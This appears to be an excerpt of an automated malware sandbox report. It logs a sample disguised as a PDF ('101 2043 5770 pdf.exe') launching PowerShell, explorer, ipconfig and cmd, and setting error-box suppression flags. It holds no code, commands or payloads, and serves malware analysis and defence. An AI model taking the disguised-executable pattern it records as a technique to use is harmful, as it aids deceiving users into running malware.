Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
